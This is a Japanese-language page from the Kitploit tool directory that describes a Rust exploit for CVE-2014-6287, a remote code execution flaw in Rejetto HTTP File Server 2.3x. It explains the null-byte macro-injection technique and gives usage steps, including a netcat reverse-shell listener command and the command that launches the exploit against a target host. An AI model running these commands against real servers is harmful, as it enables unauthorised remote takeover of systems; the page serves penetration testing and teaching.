Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2014-6287 — Rejetto HTTP File Server (HFS) バージョン 2.3c より前の 2.3x を標的とする CVE-2014-6287 エクスプロイトの Rust 実装。 | Kitploit
ツール/GitHubGitHub/nika0x38/cve-2014-6287
ペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育リモートアクセスツール
GitHubnika0x38/cve-2014-6287

CVE-2014-6287

Rejetto HTTP File Server (HFS) バージョン 2.3c より前の 2.3x を標的とする CVE-2014-6287 エクスプロイトの Rust 実装。

リポジトリを見る
111ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2014-6287 - Rejetto HTTP File Server RCE エクスプロイト

Rust Security

CVE-2014-6287 エクスプロイトの Rust 実装。Rejetto HTTP File Server (HFS) バージョン 2.3x(2.3c より前)を標的とします。

脆弱性の概要

CVE-2014-6287 は、Rejetto HTTP File Server (HFS) における重大なリモートコード実行の脆弱性です。

技術的詳細

  • 影響を受けるソフトウェア: Rejetto HTTP File Server (HFS) 2.3x(2.3c より前)
  • 脆弱性の種類: リモートコード実行 (RCE)
  • CVSS スコア: 10.0 (Critical)
  • CWE: CWE-94(コード生成の制御が不適切)

説明

Rejetto HTTP File Server の parserLib.pas 内の findMacroMarker 関数は、検索アクション内の %00 シーケンスを介して、リモートの攻撃者が任意のプログラムを実行することを可能にします。この脆弱性により、攻撃者は入力検証を回避し、ターゲットシステム上で実行される悪意のあるコードを注入できます。

このエクスプロイトは次のように動作します:

  1. ヌルバイト (%00) を含む悪意のある検索クエリを作成する
  2. マクロ区切り文字 {. と .} 内に PowerShell コマンドを注入する
  3. サーバーがマクロを処理し、埋め込まれた PowerShell コードを実行する
  4. 攻撃者へのリバースシェル接続を確立する

使用方法

ステップ 1: Netcat リスナーをセットアップする

エクスプロイトを実行する前に、攻撃マシン上でリバースシェルを受け取るためのリスナーをセットアップします:

root@kitploit:~
# <LPORT> を使用したいリッスンポートに置き換えてください
nc -lvnp <LPORT>

ステップ 2: エクスプロイトを実行する

root@kitploit:~
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]

必須パラメータ:

  • -l, --lhost <LHOST>: ローカル IP アドレス(攻撃マシン)
  • -p, --lport <LPORT>: リバースシェル用のローカルポート
  • -r, --rhost <RHOST>: ターゲット IP アドレス(脆弱な HFS サーバー)

オプションパラメータ:

  • -t, --rport <RPORT>: ターゲットポート(デフォルト: 80)

免責事項

このツールは教育目的および許可された侵入テスト目的のみに使用してください。責任を持って、所有しているシステムまたは明示的な許可を得たシステムに対してのみ使用してください。

ツールをダウンロード